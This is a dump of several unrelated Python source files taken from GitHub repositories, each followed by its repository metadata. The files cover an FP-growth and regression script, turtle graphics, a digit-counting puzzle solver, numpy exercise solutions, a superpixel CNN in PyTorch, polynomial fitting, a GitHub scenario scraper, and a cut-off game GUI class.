for ele in scores_list:\r\n# for key in name_dict:\r\n# if ele == Change(key):\r\n# sheet.write(cnt, 0, name_dict[key][0])\r\n# sheet.write(cnt, 1, name_dict[key][1])\r\n# sheet.write(cnt, 2, scores_list[ele])\r\n# cnt = cnt + 1\r\n\r\n# name = str(year) + state_name + \".xls\"\r\n# name = \"spread/\" + name\r\n# file.save(name)\r\n\r\n\r\n# # # generation(\"VA\")\r\n# # T = 60\r\n# # min_s = 120\r\n# # for i in range(2010, 2017):\r\n# # i = float(i)\r\n# # print(i)\r\n\r\n# # if i == 2015.0:\r\n# # # print(\"!\")\r\n# # min_s = 40\r\n# # T = 50\r\n# # elif i == 2016.0:\r\n# # # print(\"!\")\r\n# # min_s = 21\r\n# # T = 50\r\n# # else:\r\n# # min_s = min_s - 15\r\n\r\n# # generation(\"VA\", i, min_s, T)\r\n\r\n# clf = skN.KNeighborsRegressor(n_neighbors=30)\r\n# # # clf = skS.SVR()\r\n# # # from sklearn.linear_model import ElasticNet\r\n# # # clf = ElasticNet(random_state=0)\r\n# # # clf = 
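One more aside on this FP-growth record: the w_list built with a TF1 session at the top of the file is just the scalar formula w = 2·(1 − sigmoid((year − 2010)/3)), so plain numpy reproduces it without any graph or session (sketch):

```python
import numpy as np

years = np.arange(2010, 2018)
w_list = 2.0 * (1.0 - 1.0 / (1.0 + np.exp(-(years - 2010) / 3.0)))
# w starts at 1.0 for 2010 (sigmoid(0) = 0.5) and decays toward 0,
# down-weighting later years in the scoring loop above.
```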
GaussianProcessRegressor()\r\n# # # clf = GaussianNB()\r\n# # X = [[0], [1], [2], [3]]\r\n# # y = [0, 0, 1, 1]\r\n# # neigh = KNeighborsRegressor(n_neighbors=2)\r\n# # neigh.fit(X, y)\r\n\r\n# # print(neigh.predict([[1.5]]))\r\n\r\n# l_TC = []\r\n# # print(l_T)\r\n# for i in range(len(l_T)):\r\n# l_TC.append([l_T[i]])\r\n# # print(l_TC)\r\n# clf.fit(l_TC, l_Le)\r\n# y_ = clf.predict(l_TC)\r\n\r\n# # print(\"L_Le:\")\r\n# # print(l_Le)\r\n# # plt.figure()\r\n# # plt.plot(l_T, l_Le)\r\n# # plt.plot(l_T, y_)\r\n# # pic_name = \"one.jpg\"\r\n# # plt.savefig(pic_name)\r\n# # y_ = np.array(y_)\r\n# innnn = 0\r\n# mm = 10000\r\n# for i in range(len(y_)):\r\n# if y_[i] < mm:\r\n# innnn = i\r\n# mm = y_[i]\r\n# min_n = mm\r\n# xx = l_T[innnn]\r\n# plt.figure()\r\n# plt.title(\"VA Heroin\")\r\n# plt.plot(l_T, l_Le, label=\"Scores\")\r\n# plt.plot(l_T, y_, label=\"Regression Results\")\r\n# plt.xlabel(\"Threshold\")\r\n# plt.ylabel(\"CCQRT\")\r\n# plt.text(xx, min_n, xx, ha='center', va='bottom')\r\n# pic_name = \"one.jpg\"\r\n# plt.legend()\r\n# plt.savefig(pic_name)\r\n\r\n\r\n# class PrintDot(keras.callbacks.Callback):\r\n# def on_epoch_end(self, epoch, logs):\r\n# if epoch % 100 == 0:\r\n# print('')\r\n# print('.', end='')\r\n\r\n\r\n# def regression(list_X, list_Y, learning_rate=0.005, EPOCHS=500):\r\n# # Data processing\r\n# dataset = []\r\n# for ele in list_X:\r\n# dataset.append([ele])\r\n# train_labels = []\r\n# for ele in list_Y:\r\n# train_labels.append([ele])\r\n# dataset = numpy.array(dataset)\r\n# train_labels = numpy.array(train_labels)\r\n\r\n# # Parameters\r\n# learning_rate = learning_rate\r\n# EPOCHS = EPOCHS\r\n\r\n# # Network Parameters\r\n# n_hidden_1 = 16\r\n# n_hidden_2 = 64\r\n# n_hidden_3 = 8\r\n# input_shape = 1\r\n# num_classes = 1\r\n\r\n# def build_model(input_shape):\r\n# model = keras.Sequential([\r\n# layers.Dense(n_hidden_1, activation=tf.nn.relu,\r\n# input_shape=[input_shape]),\r\n# layers.Dense(n_hidden_2, activation=tf.nn.sigmoid),\r\n# layers.Dense(n_hidden_3, activation=tf.nn.sigmoid),\r\n# layers.Dense(num_classes)\r\n# ])\r\n\r\n# optimizer = tf.train.RMSPropOptimizer(learning_rate)\r\n\r\n# model.compile(loss='mse',\r\n# optimizer=optimizer,\r\n# metrics=['mae', 'mse'])\r\n# return model\r\n\r\n# model = build_model(input_shape)\r\n# model.summary()\r\n\r\n# history = model.fit(\r\n# dataset, train_labels,\r\n# epochs=EPOCHS, validation_split=0.2, verbose=0,\r\n# callbacks=[PrintDot()])\r\n\r\n# hist = pd.DataFrame(history.history)\r\n# hist['epoch'] = history.epoch\r\n# hist.tail()\r\n\r\n# def plot_history(history):\r\n# plt.figure()\r\n# plt.xlabel('Epoch')\r\n# plt.ylabel('Mean Abs Error [MPG]')\r\n# plt.plot(hist['epoch'], hist['mean_absolute_error'],\r\n# label='Train Error')\r\n# plt.plot(hist['epoch'], hist['val_mean_absolute_error'],\r\n# label='Val Error')\r\n# plt.legend()\r\n# plt.ylim([0, 5])\r\n# plt.savefig(\"1.jpg\")\r\n\r\n# plt.figure()\r\n# plt.xlabel('Epoch')\r\n# plt.ylabel('Mean Square Error [$MPG^2$]')\r\n# plt.plot(hist['epoch'], hist['mean_squared_error'],\r\n# label='Train Error')\r\n# plt.plot(hist['epoch'], hist['val_mean_squared_error'],\r\n# label='Val Error')\r\n# plt.legend()\r\n# plt.ylim([0, 5])\r\n# plt.savefig(\"2.jpg\")\r\n\r\n# print()\r\n# plot_history(history)\r\n\r\n# # example_result = model.predict(dataset_test[:1])\r\n# # print(\"\\nresult:\", example_result)\r\n# shape = numpy.shape(dataset)\r\n# output = []\r\n# for i in range((shape[0])):\r\n# result = model.predict(dataset[i:i+1])\r\n# # 
print(result[0][0])\r\n#             r = result[0][0]\r\n#             output.append(r)\r\n\r\n#     # print(output)\r\n#     return output\r\n\r\n\r\n# # for i in range(len(l_T)):\r\n# #     l_T[i] = (l_T[i] - 19.0) / 20.0\r\n\r\n# # for i in range(len(l_Le)):\r\n# #     l_Le[i] = l_Le[i] * 100.0\r\n# #     print(l_Le[i])\r\n\r\n# # y_ = regression(l_T, l_Le, learning_rate=0.01, EPOCHS=500)\r\n# # for i in range(len(y_)):\r\n# #     y_[i] = y_[i] - 0.02\r\n\r\n# # plt.figure()\r\n# # plt.title(\"VA Heroin\")\r\n# # plt.plot(l_T, l_Le, label=\"Scores\")\r\n# # plt.plot(l_T, y_, label=\"Regression Results\")\r\n# # pic_name = \"one.jpg\"\r\n# # plt.legend()\r\n# # plt.savefig(pic_name)\r\n\r\n# # for ele in l_T:\r\n# #     print(ele)\r\n\r\n# # for e in l_Le:\r\n# #     print(e)\r\n\r\n# [[A, B, E],\r\n#  [A, C],\r\n#  [D, B],\r\n#  [C, B, E],\r\n#  [B, C, D]]\r\n\r\n# [[B],\r\n#  [C],\r\n#  [B],\r\n#  [B, C],\r\n#  [B, C]]\r\n\r\n\r\n# def build_tree(list_data, T):\r\n#     if len(list_data) == 0:\r\n#         return\r\n#     else:\r\n#         element = list_data.pop()\r\n#         if element == T.child.name:\r\n#             T.child.count = T.child.count + 1\r\n#             build_tree(list_data, T)\r\n#         else:\r\n#             T = new_child(T)\r\n#             T.new_child.name = element\r\n#             T.new_child.count = 1\r\n#             build_tree(list_data, T)\r\n","repo_name":"lcwx/Miscellaneous","sub_path":"美赛代码2019/FP-growth.py","file_name":"FP-growth.py","file_ext":"py","file_size_in_byte":28385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28980600229","text":"import turtle\nimport math\n\ndef polygon(t,l,n): \n    for i in range(n):\n        t.forward(l)\n        t.left(360/n)\n\ndef circle(t,r):\n    circunf = 2*math.pi*r\n    n = int((circunf/3) + 3)\n    length = circunf/n\n    polygon(t,length,n)\n\njn = turtle.Screen()\nbob = turtle.Turtle()\n\nr = float(input('Enter the radius value: '))\n\ncircle(bob,r)\n","repo_name":"apollovsilva/Python","sub_path":"Aula 6/Exercícios em preparação/exrpreparacao4_aula6.py","file_name":"exrpreparacao4_aula6.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39384664905","text":"def get_no_nines(l_num_s,h_num_s) :\n\n\ttot_count = -1\n\tl_num = int(l_num_s)\n\th_num = int(h_num_s)\n\tnum_diff = h_num - l_num\n\n\tif ('9' in l_num_s) or ('9' in h_num_s) :\n\t\treturn tot_count,False\n\telif (l_num % 9 == 0) or (h_num % 9 == 0):\n\t\treturn tot_count, False\n\telse:\n\t\tl_dig_count = len(l_num_s)\n\t\th_dig_count = len(h_num_s)\n\t\tm_nines_count = 0\n\t\tm_nines_ex_count = 0\n\t\tm_nines_overlaps = 0\n\t\tlsd_nines = 0\n\n\t\tlsd_add_factor = 0\n\t\tadd_factor = 0\n\t\toverlap_add_factor = 0\n\n\t\tdig_diff = h_dig_count - l_dig_count\n\n\t\t#if dig_diff > 0 :\n\t\tm_n_p = h_dig_count - 2\n\t\tskip_d = dig_diff\n\t\n\t\t'''\n\t\tLoop to get the numbers with nines at positions other than at the end. 
Those with 9 at the end and those divisible \n\t\tby 9 are excluded as those would be counted in the subsequent sections.\n\t\tOuter loop make it go through the number segments in the order of significance , from highest to lowest \n\t\tand the inner loop adds up the actual count at every segment based on the position of the order of significance.\n\t\t'''\n\t\tfor i in range(h_dig_count-2) :\n\t\t\tif i == 0 : \n\t\t\t\tif skip_d > 0 :\n\t\t\t\t\tm_n_m = int(h_num_s[i])\n\t\t\t\telse :\n\t\t\t\t\tm_n_m = int(h_num_s[i]) - int(l_num_s[i])\n\t\t\telse :\n\t\t\t\tif skip_d > 0 :\n\t\t\t\t\tm_n_m = 9+int(h_num_s[i])\n\t\t\t\telse :\n\t\t\t\t\tm_n_m = (9 - int(l_num_s[i-dig_diff])) + int(h_num_s[i])\n\n\t\t\t#if m_n_m > 0 :\n\t\t\t\t\n\t\t\tp_factor = m_n_p\n\t\t\tp_factor_total_1 = 0\n\t\t\tp_factor_total_2 = 0\n\n\t\t\tp_factor_overlap_1 = 0\n\t\t\tp_factor_overlap_2 = 0\n\n\t\t\t\n\t\t\tlsd_nines_factor_1 = 0\n\t\t\tlsd_nines_factor_2 = 0\n\t\t\tfor k in range(p_factor) :\n\t\t\t\tif k == 0 :\n\t\t\t\t\tp_factor_total_1 = (9**k) * (10**(m_n_p-k))\n\t\t\t\t\tp_factor_overlap_1 = (9**k) * ((10**(m_n_p-k)-1)/9+1)\n\t\t\t\t\tlsd_nines_factor_1 = (9**k) * (10**(m_n_p-k-1))\n\t\t\t\telse :\n\t\t\t\t\tp_factor_total_2 += (9**k) * (10**(m_n_p-k))\n\t\t\t\t\tp_factor_overlap_2 += (9**k) * ((10**(m_n_p-k)-1)/9+1)\n\t\t\t\t\tlsd_nines_factor_2 += (9**k) * (10**(m_n_p-k-1))\n\n\t\t\tif m_n_m >= 1 :\t\t\n\t\t\t\tadd_factor = (m_n_m * p_factor_total_1) + ((m_n_m-1) * p_factor_total_2)\n\t\t\t\toverlap_add_factor = (m_n_m * p_factor_overlap_1) + ((m_n_m-1) * p_factor_overlap_2)\n\t\t\t\tlsd_add_factor = (m_n_m * lsd_nines_factor_1) + ((m_n_m-1) * lsd_nines_factor_2)\n\t\t\t#else :\n\t\t\t#\tadd_factor = 0\n\t\t\t\t\t\t\t\n\t\t\tm_nines_count += add_factor\n\t\t\tm_nines_overlaps += overlap_add_factor\n\t\t\tlsd_nines += lsd_add_factor\n\t\t\tm_nines_ex_count = m_nines_count - (2 * lsd_nines)\n\n\t\t\tprint('m_n_p,skip_d =>',m_n_p,skip_d)\n\t\t\tm_n_p -= 1\n\t\t\tskip_d -= 1\n\n\t\tprint('m_nines_ex_count :',m_nines_ex_count,m_nines_count, lsd_nines)\n\n\t\t#Gets all the numbers with 9 at the end (i.e. 
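the last digit)\n\n\t\t# Sanity check (a sketch, feasible for small ranges only): the closed-form\n\t\t# tally below can be validated against a brute-force count:\n\t\t#   sum(1 for v in range(l_num, h_num + 1)\n\t\t#       if '9' not in str(v) and v % 9 != 0)\n\n\t\t#Gets all the numbers with 9 at the end (i.e. 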
as the least significant digit)\n\n\t\ts_nines_count = int(h_num/10) - int(l_num/10)\n\t\t\n\t\tprint('s_nines_count :',s_nines_count)\n\n\t\t#Gets all the numbers divisible by 9\n\t\td_nines_count = 0 \n\n\t\tnext_h_l_div = l_num + (9 - (l_num%9))\n\t\tnext_l_h_div = h_num - (h_num%9)\n\n\t\td_nines_count = int(((next_l_h_div - next_h_l_div)/9)+1)\n\t\tprint('d_nines_count :',d_nines_count)\n\n\t\t# Find the overlap where the numbers with 9 at the end are divisible by 9 too.\n\n\t\tlsd_next_hl = int(str(next_h_l_div)[-1])\n\t\tlsd_next_lh = int(str(next_l_h_div)[-1])\n\n\t\tif lsd_next_hl == 9 :\n\t\t\tlsd_9_next_h_l_div = next_h_l_div\n\t\telse :\n\t\t\tlsd_9_next_h_l_div = next_h_l_div + ((lsd_next_hl+1)*9)\n\n\t\tif lsd_next_lh == 9 :\n\t\t\tlsd_9_next_l_h_div = next_l_h_div\n\t\telse :\n\t\t\tlsd_9_next_l_h_div = next_l_h_div - ((9-lsd_next_lh)*9)\n\n\t\tprint ('lsd 9 divs :',lsd_9_next_h_l_div,lsd_9_next_l_h_div)\n\n\t\ttot_div_lsd_overlaps = int((lsd_9_next_l_h_div - lsd_9_next_h_l_div)/90) + 1\n\n\t\t# Total valid turns (count) is calculated by reducing all those with 9s at end position or otherwise from all numbers\n\t\t# in the range, after adjusting for the overlaps from above.\n\n\t\tprint('tot_div_lsd_overlaps :',tot_div_lsd_overlaps)\t\n\t\ttot_count = (num_diff + 1) - (m_nines_ex_count+s_nines_count+d_nines_count - tot_div_lsd_overlaps)\n\n\t\treturn tot_count,True\n\n\nnum_tests = input()\n\nn_attempts = 1 \nif num_tests.isdecimal() :\n\tprint ('test cases :',num_tests)\n\tfor i in range(int(num_tests)) :\n\t\tfor a in range(n_attempts) :\n\t\t\tdspl_num_in = input()\n\t\t\tlh_nums = dspl_num_in.split()\n\t\t\tl_num,h_num = lh_nums[0],lh_nums[1]\n\t\t\tprint('nums',l_num,h_num)\n\t\t\tif l_num.isdecimal() and h_num.isdecimal() :\n\t\t\t\t'''\n\t\t\t\tkey_press,key_type_plus = findNearestEN(d_num = dspl_num)\n\t\t\t\tprint ('Press {} key {} times'.format(('+' if key_type_plus else '-'),key_press ))\n\t\t\t\tbreak\n\t\t\t\t'''\n\t\t\t\ttot_count,check_status = get_no_nines(l_num_s=l_num,h_num_s=h_num)\n\t\t\t\tif check_status :\n\t\t\t\t\tprint('Case #{} : {}'.format(i,tot_count))\n\t\t\t\telse :\n\t\t\t\t\tprint('Not valid input - high,low or both contain digit 9 or divisible by 9')\n\t\t\telse :\t\t\n\t\t\t\tprint('Not a valid input, takes only integers')\n\t\t\t\tcontinue\t","repo_name":"Synapsion/l_unl_l","sub_path":"no_nines.py","file_name":"no_nines.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"602176323","text":"from nbautoeval import Args, ExerciseFunctionNumpy\n\n# @BEG@ name=xixj\nimport numpy as np\n\ndef xixj(*args):\n \"\"\"\n si les arguments sont x1, x2, .. xn\n retourne une matrice carrée n x n\n dont les éléments valent\n m[i, j] = xi * xj\n\n première solution à base de produit usuel\n entre un vecteur et une colonne, en utilisant\n le broadcasting\n\n credits: JeF29\n \"\"\"\n\n # une ligne qui contient x1, .. 
xn\n line = np.array(args)\n # habile façon de reshaper automatiquement\n column = line.reshape(-1, 1)\n # on aurait pu faire aussi\n #column = line[:, np.newaxis]\n return line * column\n# @END@\n\n# @BEG@ name=xixj more=2\ndef xixj_2(*args):\n \"\"\"\n pareil mais on construit la colonne avec .T\n qui est la transposée - méfiance quand même\n \"\"\"\n # sauf que pour pouvoir utiliser .T il faut\n # une shape qui est explicitement [1, n]\n #\n # c'est pourquoi moi j'ai tendance à éviter .T\n # voyez plutôt np.transpose() si vous avez besoin\n # de transposer une matrice\n line = np.array(args).reshape((1, -1))\n return line * line.T\n# @END@\n\n\n# @BEG@ name=xixj more=3\ndef xixj_3(*args):\n \"\"\"\n on peut aussi penser à faire un produit matriciel\n \"\"\"\n # on doit lui donner une dimension 2 même si c'est une ligne\n line = np.array(args).reshape((1, -1))\n column = line.reshape((-1, 1))\n return column @ line\n# @END@\n\n\n# @BEG@ name=xixj more=4\ndef xixj_4(*args):\n \"\"\"\n pareil mais en utilisant .dot()\n \"\"\"\n column = np.array(args).reshape((-1, 1))\n # dans cette version on fait le produit de matrice\n # en utilisant la méthode dot sur les tableaux\n return column.dot(column.T)\n # remarquez qu'on aurait pu faire aussi bien\n # return np.dot(column, column.T)\n# @END@\n\n\ndef xixj_ko(*args):\n # presque ça mais sans le reshape\n array = np.array(args)\n return array.T @ array\n\n\ninputs_xixj = [\n Args(1),\n Args(1, 2),\n Args(1, 2, 4),\n Args(1, 0, 4),\n Args(8, 4, 2),\n Args(0, 1, 2, 4, 8),\n Args(1, 1j, -1, -1j),\n]\n\n\nexo_xixj = ExerciseFunctionNumpy(\n xixj, inputs_xixj,\n nb_examples = 3,\n)\n","repo_name":"flotpython/course","sub_path":"modules/corrections/exo_xixj.py","file_name":"exo_xixj.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"fr","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"36995371848","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.nn.init import kaiming_normal_, constant_\n\n__all__ = ['spnet','spnet_bn']\n\n#model_paths = {\n# 'spnet_bn': os.path.join(os.path.abspath(os.path.dirname(__file__)), \n# 'pretrain_ckpt/SpixelNet_bsd_ckpt.tar'),\n#}\n\ndef predict_param(in_planes, channel=3):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True)\n\ndef predict_mask(in_planes, channel=9):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True)\n\ndef predict_feat(in_planes, channel=20, stride=1):\n \n return nn.Conv2d(in_planes, channel, kernel_size=3, stride=stride, padding=1, bias=True)\n\ndef predict_prob(in_planes, channel=9):\n \n return nn.Sequential(\n nn.Conv2d(in_planes, channel, kernel_size=3, stride=1, padding=1, bias=True),\n nn.Softmax(1))\n\ndef conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1):\n if batchNorm:\n \n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, \n padding=(kernel_size - 1) // 2, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.LeakyReLU(0.1))\n else:\n\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, \n padding=(kernel_size - 1) // 2, bias=True),\n nn.LeakyReLU(0.1))\n\ndef deconv(in_planes, out_planes):\n\n return nn.Sequential(\n nn.ConvTranspose2d(in_planes, out_planes, kernel_size=4, stride=2, padding=1, bias=True),\n nn.LeakyReLU(0.1))\n\n\nclass SpixelNet(nn.Module):\n expansion = 1\n\n def __init__(self, batchNorm=True):\n 
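# Usage sketch (hedged): with four stride-2 encoder stages, input height\n        # and width should be divisible by 16, e.g.\n        #   net = SpixelNet(batchNorm=True)\n        #   prob = net(torch.randn(1, 3, 224, 224))  # -> (1, 9, 224, 224)\n        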
super(SpixelNet,self).__init__()\n self.batchNorm = batchNorm\n self.assign_ch = 9\n self.conv0a = conv(self.batchNorm, 3, 16, kernel_size=3)\n self.conv0b = conv(self.batchNorm, 16, 16, kernel_size=3)\n self.conv1a = conv(self.batchNorm, 16, 32, kernel_size=3, stride=2)\n self.conv1b = conv(self.batchNorm, 32, 32, kernel_size=3)\n self.conv2a = conv(self.batchNorm, 32, 64, kernel_size=3, stride=2)\n self.conv2b = conv(self.batchNorm, 64, 64, kernel_size=3)\n self.conv3a = conv(self.batchNorm, 64, 128, kernel_size=3, stride=2)\n self.conv3b = conv(self.batchNorm, 128, 128, kernel_size=3)\n self.conv4a = conv(self.batchNorm, 128, 256, kernel_size=3, stride=2)\n self.conv4b = conv(self.batchNorm, 256, 256, kernel_size=3)\n self.deconv3 = deconv(256, 128)\n self.conv3_1 = conv(self.batchNorm, 256, 128)\n self.pred_mask3 = predict_mask(128, self.assign_ch)\n self.deconv2 = deconv(128, 64)\n self.conv2_1 = conv(self.batchNorm, 128, 64)\n self.pred_mask2 = predict_mask(64, self.assign_ch)\n self.deconv1 = deconv(64, 32)\n self.conv1_1 = conv(self.batchNorm, 64, 32)\n self.pred_mask1 = predict_mask(32, self.assign_ch)\n self.deconv0 = deconv(32, 16)\n self.conv0_1 = conv(self.batchNorm, 32 , 16)\n self.pred_mask0 = predict_mask(16,self.assign_ch)\n self.softmax = nn.Softmax(1)\n self.start_time = 0\n self.end_time = 0\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n kaiming_normal_(m.weight, 0.1)\n if m.bias is not None:\n constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n constant_(m.weight, 1)\n constant_(m.bias, 0)\n\n def forward(self, x):\n self.start_time = time.time()\n out1 = self.conv0b(self.conv0a(x)) \n out2 = self.conv1b(self.conv1a(out1)) \n out3 = self.conv2b(self.conv2a(out2)) \n out4 = self.conv3b(self.conv3a(out3)) \n out5 = self.conv4b(self.conv4a(out4)) \n\n out_deconv3 = self.deconv3(out5)\n concat3 = torch.cat((out4, out_deconv3), 1)\n out_conv3_1 = self.conv3_1(concat3)\n\n out_deconv2 = self.deconv2(out_conv3_1)\n concat2 = torch.cat((out3, out_deconv2), 1)\n out_conv2_1 = self.conv2_1(concat2)\n\n out_deconv1 = self.deconv1(out_conv2_1)\n concat1 = torch.cat((out2, out_deconv1), 1)\n out_conv1_1 = self.conv1_1(concat1)\n\n out_deconv0 = self.deconv0(out_conv1_1)\n concat0 = torch.cat((out1, out_deconv0), 1)\n out_conv0_1 = self.conv0_1(concat0)\n mask0 = self.pred_mask0(out_conv0_1)\n prob0 = self.softmax(mask0)\n self.end_time = time.time()\n\n return prob0\n\n def weight_parameters(self):\n \n return [param for name, param in self.named_parameters() if 'weight' in name]\n\n def bias_parameters(self):\n \n return [param for name, param in self.named_parameters() if 'bias' in name]\n\n\ndef _spnet(arch, pretrained, **kwargs):\n model = SpixelNet(**kwargs)\n \n if pretrained:\n # if torch.cuda.is_available():\n # data = torch.load(model_paths[arch])\n # else: \n # data = torch.load(model_paths[arch], map_location=torch.device('cpu'))\n # \n # model.load_state_dict(data['state_dict'])\n pass\n \n return model\n\ndef spnet(pretrained=False):\n\n return _spnet('spnet', pretrained, batchNorm=False)\n\ndef spnet_bn(pretrained=False):\n\n return _spnet('spnet_bn', pretrained, batchNorm=True)\n\n","repo_name":"weikunhan/pytorch-benchmark-custom-models","sub_path":"custom_models/modified_spnet.py","file_name":"modified_spnet.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28578867653","text":"import matplotlib.pyplot 
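as plt\nimport numpy as np\n\n# Note (a sketch): each hand-built Vandermonde system below can also be\n# generated with np.vander, e.g. for the cubic fit:\n#   pts = np.array([1, 4, 10, 15])\n#   coeffs = np.linalg.solve(np.vander(pts, increasing=True), f_x(pts))\n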
\ndef f_x(x):\n    return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\nA_1 = np.array([[1, 1], [1, 15]])\nb_1 = np.array([f_x(1), f_x(15)])\nnp.linalg.solve(A_1, b_1)\n\npoly_rank = 2\nA_2 = np.array([[1**n for n in range(poly_rank + 1)],\n                [8**n for n in range(poly_rank + 1)],\n                [15**n for n in range(poly_rank + 1)]])\nb_2 = np.array([f_x(1), f_x(8), f_x(15)])\nnp.linalg.solve(A_2, b_2)\n\npoly_rank = 3\nA_3 = np.array([[1**n for n in range(poly_rank + 1)],\n                [4**n for n in range(poly_rank + 1)],\n                [10**n for n in range(poly_rank + 1)],\n                [15**n for n in range(poly_rank + 1)]])\nb_3 = np.array([f_x(1), f_x(4), f_x(10), f_x(15)])\nnp.linalg.solve(A_3, b_3).round(2)\n\n\ndef f(x, c):\n    return c[0] + c[1]*x + c[2]*x**2 + c[3]*x**3\n\nc = [4.36264154, -1.29552587, 0.19333685, -0.00823565]\nx = np.arange(0, 16, 0.5)\nplt.plot(x, f_x(x), x, f(x, c))\nplt.xlabel(r'$x$'), plt.ylabel(r'$f(x)$')\nplt.grid(True)\nplt.show()\n","repo_name":"Tirren/data-analysis","sub_path":"submission-2.py","file_name":"submission-2.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71809712434","text":"import argparse\nimport json\n\nfrom scrapy import signals\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.signalmanager import dispatcher\n\nfrom add_read_me_table import add_table_to_file\nfrom repo_metadata_scraper import MetadataSpider\nfrom repo_name_scraper import RepoNameSearchSpider\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-d', '--data_file', help='data file name', required=True)\n    parser.add_argument('--discover', action='store_true', help='discover new repositories')\n    parser.add_argument('--collect_metadata', help='scrape metadata for all or new repos', choices=['all', 'new'])\n    parser.add_argument('-o', '--output_file', help='output file name')\n    args = parser.parse_args()\n\n    process = CrawlerProcess()\n\n    if args.discover:\n        f = open(args.data_file, 'a+')\n        process.crawl(RepoNameSearchSpider, output_file=f)\n        process.start()\n        f.close()\n\n    if args.collect_metadata is not None:\n        urls = []\n        results = []\n        data = []\n\n        def crawler_results(signal, sender, item, response, spider):\n            results.append(item)\n        # connect callback to dispatcher to get crawler results after all urls are consumed\n        dispatcher.connect(crawler_results, signal=signals.item_passed)\n        # read repo names from data file as required\n        with open(args.data_file) as f:\n            for line in f:\n                jl = (json.loads(line))\n                data.append(jl)\n                # if collect_metadata is all, scrape all. Else scrape the ones that are\n                # not scraped before (i.e. does not have a 'url')\n                if 'name' in jl and (args.collect_metadata == 'all' or 'url' not in jl):\n                    urls.append('https://github.com/' + jl['name'])\n\n        print('Running metadata scraper for', len(urls), 'urls')\n        process.crawl(MetadataSpider, in_urls=urls)\n        process.start()\n        # after scraping ends, merge existing and new results\n        
If one of the DS are switched to a map, can be reduced to O(n)\n # at the current n (~500), it does not make a great difference\n for data_index in range(len(data)):\n for result in results:\n if data[data_index]['name'] == result['name']:\n data[data_index] = result\n break\n\n # overwrite data file with the new results\n with open(args.data_file, 'w') as f:\n f.seek(0)\n for d in data:\n f.write(json.dumps(d) + '\\n')\n f.truncate()\n\n if args.output_file is not None:\n add_table_to_file(args.data_file, args.output_file)\n","repo_name":"esg4aspl/Gherkin-Scenario-Collection-and-Analysis","sub_path":"scenario_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2962476388","text":"import os, random\n\n# Game engine imports\nfrom core import *\n\n# Game imports\nfrom consts import *\nfrom helpers import *\nfrom gui.gui_elements import *\nfrom gui.mascot import *\n\n\nclass GUI_puzzle_select_container(GUI_element_network_container):\n \"\"\"\n All elements in puzzle selection screen live inside this thing.\n \"\"\"\n \n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.gui_init()\n self.z = Z_GUI_CONTAINERS\n self.width = self.game.settings['screen_width']\n self.height = self.game.settings['screen_height']\n self.alpha = .1\n self.colour = (1.0, .7, .5)\n\n self.title = Text(self.game.core.media.fonts['menu_titles'], 20, 10, TEXT_ALIGN_TOP_LEFT, str(self.game.manager.current_pack.name))\n self.title.z = Z_GUI_OBJECT_LEVEL_2\n self.title.colour = (0.95, 0.58, 0.09)\n self.title.shadow = 2\n self.title.shadow_colour = (0.7, 0.7, 0.7)\n\n self.author = None\n if self.game.manager.user_created_puzzles:\n self.author = Text(self.game.core.media.fonts['menu_subtitles'], 40, 55, TEXT_ALIGN_TOP_LEFT, \"by \" + str(self.game.manager.current_pack.author_name))\n self.author.z = Z_GUI_OBJECT_LEVEL_2\n self.author.colour = (0.45, 0.45, 0.45)\n self.author.shadow = 2\n self.author.shadow_colour = (0.9, 0.9, 0.9)\n\n GUI_puzzle_select_go_back(self.game, self)\n self.mascot_object = Mascot_Puzzle_Select(self.game) \n self.puzzle_name = Hover_text(\n self.game,\n self.game.settings['screen_width'] / 2,\n (self.game.settings['screen_height'] / 2) - 350\n )\n self.puzzle_best_time = Hover_text(\n self.game,\n self.game.settings['screen_width'] / 2,\n (self.game.settings['screen_height'] / 2) - 310)\n self.puzzle_size = Hover_text(\n self.game,\n (self.game.settings['screen_width'] / 2) + 200,\n (self.game.settings['screen_height'] / 2) - 310,\n \"puzzle_select_size\",\n 2.0\n )\n\n i = 0\n for puzzle_filename in self.game.manager.current_pack.order:\n GUI_puzzle_puzzle_item(self.game, self, puzzle_filename, self.game.manager.current_pack.puzzles[puzzle_filename], i)\n i += 1\n\n if self.game.manager.user_created_puzzles:\n GUI_puzzle_select_rating_star_container(self.game, self)\n if not self.game.manager.current_pack.uuid in self.game.player.packs_reported:\n self.report_button = GUI_puzzle_select_report(self.game, self)\n \n # Draw strategy data\n self.text_offset_x = 0.0\n self.text_offset_y = 0.0\n self.draw_strategy = \"balloons_background\"\n\n\n def Execute(self):\n self.update()\n self.puzzle_name.set_text(\"\")\n self.puzzle_best_time.set_text(\"\")\n self.puzzle_size.set_text(\"\")\n \n 